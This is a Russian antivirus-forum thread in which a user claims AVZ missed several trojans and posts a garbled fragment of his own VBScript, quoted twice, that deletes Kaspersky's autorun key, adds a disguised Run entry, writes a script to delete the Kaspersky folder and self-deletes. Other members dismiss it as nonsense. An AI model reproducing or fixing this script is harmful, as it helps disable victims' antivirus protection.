Показано с 1 по 17 из 17.

avz - не нашло шесть вирусов

  1. #1
    Banned Репутация
    Регистрация
    19.07.2007
    Сообщений
    12
    Вес репутации
    0

    avz - не нашло шесть вирусов

    Просто решил для экспиремента скачать с интернета 6 вирусов в архивах, касперский их сразу обнаружил, но я решил посмотреть что скажет avz - молчит, хотя я поставил проверку архивов. Вот собственно говоря сами вирусы:
    1. троянская программа Backdoor.Win32.Delf.aty
    2. троянская программа Backdoor.Win32.Delf.aty
    3. троянская программа Trojan-Downloader.Win32.Delf.bkf
    4. троянская программа Trojan-Downloader.Win32.Delf.bkf
    5. троянская программа Backdoor.Win32.Delf.aty
    6. троянская программа Trojan-PSW.Win32.LdPinch.bdh
    7. моя собственная работа - удаляет касперского из автозагрузки
    конечно они повторяются (по названиям, просто там есть server.exe, client.exe и тд) - но факт - есть факт.
    обновлялся я перед проверкой - может стоит внести их в базу или зачем тогда ставить проверку архивов

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Visiting Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    25.02.2007
    Сообщений
    8,032
    Вес репутации
    1718
    Отправьте Олегу сами файлы http://z-oleg.com/secur/avz/uploadvir.php и ссылку на источник http://z-oleg.com/secur/avz/uploadu.php

  4. #3
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для drongo
    Регистрация
    17.09.2004
    Адрес
    Israel
    Сообщений
    7,164
    Вес репутации
    994
    насчёт 7 вируса, каспер довольно жёстко защищает свои ключики - без окна проактивки тут не обойтись- или всё-таки нашёл обход проактивки ?

  5. #4
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для ВодкуГлыть
    Регистрация
    08.05.2006
    Адрес
    Омск
    Сообщений
    399
    Вес репутации
    155
    Честно говоря, в 7 мне мало верится, потму как самозащита в KAV очень, скажем так, на уровне. Вообще пост похож на саморекламу.
    Быстро, Качественно, Дёшево - вычеркните лишнее слово.
    http://www.pcmag.ru/images/pcm_it_specialist.png

  6. #5
    Visiting Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Muffler
    Регистрация
    03.05.2006
    Адрес
    U.S.
    Сообщений
    713
    Вес репутации
    850
    avz - не нашло шесть вирусов
    Всех детектить невозможно...

    Вот результаты моего последнего теста:

    Код:
    Sunday, September 2, 2007
    Total 216 files to scan.
    =====================
    KAV
    Scaned: 313
    Detected: 210
    =====================
    AVZ
    Scaned: 232
    Detected: 102
    Suspicious: 19
    =====================
    DrWeb CureIt Beta
    Scaned: 215
    Detected: 174
    =====================
    Avira Antivir
    Scaned: 228
    Detected: 182
    =====================
    Добавлено через 7 минут

    1. троянская программа Backdoor.Win32.Delf.aty
    2. троянская программа Backdoor.Win32.Delf.aty
    3. троянская программа Trojan-Downloader.Win32.Delf.bkf
    4. троянская программа Trojan-Downloader.Win32.Delf.bkf
    5. троянская программа Backdoor.Win32.Delf.aty
    6. троянская программа Trojan-PSW.Win32.LdPinch.bdh
    Три зловреда...

    Плюс ->

    7. моя собственная работа
    - удаляет касперского из автозагрузки
    ...неповерю пока неувижу...
    Последний раз редактировалось Muffler; 30.09.2007 в 22:50. Причина: Добавлено

  7. #6
    Banned Репутация
    Регистрация
    19.07.2007
    Сообщений
    12
    Вес репутации
    0
    я знаю что зловреда три, но касперский их как 6 определил, просто они на части разделены,
    а мой вирус содержит просто в себе простенький скрипт который выполняет другой простенький скрипт - работает 100 %
    вот некотарая часть одного из скриптов
    Set FileSystemObject = CreateObject("scripting.filesystemobject")
    Set fso = CreateObject("Wscript.Shell")
    on error resume next
    fso.regdelete "HKEY_LOCAL\MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CUR RENTVERSION\RUN\Kav"
    fso.regwrite "HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURR ENTVERSION\RUN\Explorer","c:\windows\system\Explor er"
    dim usb
    Set fso = CreateObject("Scripting.FileSystemObject")
    Set usb = fso.CreateTextFile("c:\windows\system\Explorer.vbs ", True)
    fso.WriteLine ("Set fso = CreateObject("scripting.filesystemobject")
    fso.DeleteFolder "c:\program files\Kaspersky Lab"")
    usb.Close
    fso.popup "Вывести сообщение",,"Диагностический центр Windows",0+16
    FileSystemObject.deletefile WScript.ScriptFullName, True
    может где ошибку допустил - просто я это на память писал, а vbs плохо знаю, поэтому не судите строго.
    что на счёт проактивки, тут да, базара нет - вещь, однако ёё можно также просто обойти, как и сидеть на пробном касперском годами, у меня уже пошёл 3 месяц пробного касперского - что мне обламываться с какойто там проактивкой (единственное что скрипт не я писал, который полностью всё делает, я так просто написал основу "см. выше" и ещё одну феньку), ну а своей работой назвал, потому что без меня его бы не было!!!
    Последний раз редактировалось Серёга ламошник; 02.10.2007 в 23:51.

  8. #7
    Expert Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для DVi
    Регистрация
    28.08.2006
    Адрес
    moscow
    Сообщений
    3,698
    Вес репутации
    2174
    Цитата Сообщение от ВодкуГлыть Посмотреть сообщение
    Честно говоря, в 7 мне мало верится, потму как самозащита в KAV очень, скажем так, на уровне. Вообще пост похож на саморекламу.
    В приведенном скрипте VBS делаются какие-то невзаимосвязанные действия. Иными словами, написана полная чушь.
    И уж однозначно такая строчка пресекается самозащитой KAV:
    fso.DeleteFolder "c:\program files\Kaspersky Lab"
    Подозреваю, что под именем "Серёга ламошник" к нам пожаловал знаменитый своей безграмотностью Nodik/Vitalik/леночка с фан-клуба ЛК

  9. #8
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для drongo
    Регистрация
    17.09.2004
    Адрес
    Israel
    Сообщений
    7,164
    Вес репутации
    994
    Серёга ламошник ,выложите работоспособную программу убивающую каспера по этой ссылке : http://virusinfo.info/upload_virus.php?tid=12831 в zip архиве с паролем virus
    а пока это просто не серьёзно

  10. #9
    Banned Репутация
    Регистрация
    19.07.2007
    Сообщений
    12
    Вес репутации
    0
    щас!!!! с разбегу об телегу - этот вирус останется у меня в компе и это обсуждению не подлежит!!!! буду я его ещё кидать к вам - делать мне нечего!!!!
    А то, что скрипт не правельный и не последовательный я и без вас знаю - там написано что это часть скрипта - так сказать склейка со всякой ерундой, выложи я правельный скрипт( и полный) его бы сразу ламеры бы откопировали и начали бомбить бедных "пользователей" ПК, а меня потом бы совесть мучала - этот вирус я касперскому отправлю - пусть подумает над его простотой - не хотите не верьте - мне по барабану - я не говорю что я хакер, просто мне немного подфартило с этим.
    я его вообще удалю от греха подальше - и забудьте что я написал - можете считать что я нагло наврал вам - я "peace-door-bol"

  11. #10
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для SuperBrat
    Регистрация
    09.08.2006
    Адрес
    РК
    Сообщений
    1,194
    Вес репутации
    602
    Ситуация как в Северной Корее, что-то же они взорвали, но "гриб" никто не видел.
    Опыт — это слово, которым люди называют свои ошибки.

  12. #11
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для ALEX(XX)
    Регистрация
    31.03.2005
    Адрес
    Чернигов
    Сообщений
    10,777
    Вес репутации
    3731
    щас!!!! с разбегу об телегу - этот вирус останется у меня в компе и это обсуждению не подлежит!!!! буду я его ещё кидать к вам - делать мне нечего!!!!
    Тише, тише...
    Left home for a few days and look what happens...

  13. #12
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для ВодкуГлыть
    Регистрация
    08.05.2006
    Адрес
    Омск
    Сообщений
    399
    Вес репутации
    155
    Цитата Сообщение от Серёга ламошник Посмотреть сообщение
    я знаю что зловреда три, но касперский их как 6 определил, просто они на части разделены,
    а мой вирус содержит просто в себе простенький скрипт который выполняет другой простенький скрипт - работает 100 %
    вот некотарая часть одного из скриптов
    Set FileSystemObject = CreateObject("scripting.filesystemobject")
    Set fso = CreateObject("Wscript.Shell")
    on error resume next
    fso.regdelete "HKEY_LOCAL\MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CUR RENTVERSION\RUN\Kav"
    fso.regwrite "HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURR ENTVERSION\RUN\Explorer","c:\windows\system\Explor er"
    dim usb
    Set fso = CreateObject("Scripting.FileSystemObject")
    Set usb = fso.CreateTextFile("c:\windows\system\Explorer.vbs ", True)
    fso.WriteLine ("Set fso = CreateObject("scripting.filesystemobject")
    fso.DeleteFolder "c:\program files\Kaspersky Lab"")
    usb.Close
    fso.popup "Вывести сообщение",,"Диагностический центр Windows",0+16
    FileSystemObject.deletefile WScript.ScriptFullName, True
    может где ошибку допустил - просто я это на память писал, а vbs плохо знаю, поэтому не судите строго.
    что на счёт проактивки, тут да, базара нет - вещь, однако ёё можно также просто обойти, как и сидеть на пробном касперском годами, у меня уже пошёл 3 месяц пробного касперского - что мне обламываться с какойто там проактивкой (единственное что скрипт не я писал, который полностью всё делает, я так просто написал основу "см. выше" и ещё одну феньку), ну а своей работой назвал, потому что без меня его бы не было!!!
    Теперь вижу, что чушь. ИМХО, у Вас паранойя.
    Быстро, Качественно, Дёшево - вычеркните лишнее слово.
    http://www.pcmag.ru/images/pcm_it_specialist.png

  14. #13
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    09.08.2006
    Адрес
    Google
    Сообщений
    971
    Вес репутации
    520
    lol

  15. #14
    Junior Member Репутация
    Регистрация
    03.02.2006
    Сообщений
    48
    Вес репутации
    67
    там написано что это часть скрипта
    Ну да написано.
    так сказать склейка со всякой ерундой
    А вот этого не написано, хотя сииильно заметно!! И непонятно,зачем тогда вообще сюда это кидать?
    а меня потом бы совесть мучала
    А сейчас совесть не мучает, что отрываете других пользователей от более праведных дел?

    И в любом случае!! Если заявился, то действуй до конца.

    И напоследок
    не хотите не верьте - мне по барабану - я не говорю что я хакер, просто мне немного подфартило с этим.
    По моему это определение подходит под ламер. Иэ этого следует вопрос на засыпку...
    Серёга ламошник А вы случаем с помощью avz проверяли не после того как касперский удалил вирусы?! По крайне мере из Вашего первого поста такую логическую цепочку можно спрогнозировать.

  16. #15
    Banned Репутация
    Регистрация
    19.07.2007
    Сообщений
    12
    Вес репутации
    0
    вообщето вирусы были в архивах(я уже об это говорил) и касперский их не мог оттуда удалить!!!!!!!! потомучто при каждой проверке архива касперский визжал и придлогал их удалить, не зависимо от выбора - удалить - пропустить - вирусы оставались в компьютере - а скрипт для ло..ов написан - просто чисто поржать над вами - всем спасибо - все свободны

  17. #16
    Junior Member Репутация
    Регистрация
    03.02.2006
    Сообщений
    48
    Вес репутации
    67
    Серёга ламошник
    Далеко однако ты пойдешь с таким отношением.

  18. #17
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для ALEX(XX)
    Регистрация
    31.03.2005
    Адрес
    Чернигов
    Сообщений
    10,777
    Вес репутации
    3731
    Цитата Сообщение от Серёга ламошник Посмотреть сообщение
    все свободны
    Уговорил, свободен
    Left home for a few days and look what happens...

Похожие темы

  1. Плюс один, минус шесть
    От SDA в разделе Другие новости
    Ответов: 4
    Последнее сообщение: 04.06.2009, 16:22

Свернуть/Развернуть Ваши права в разделе

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Page generated in 0.00931 seconds with 19 queries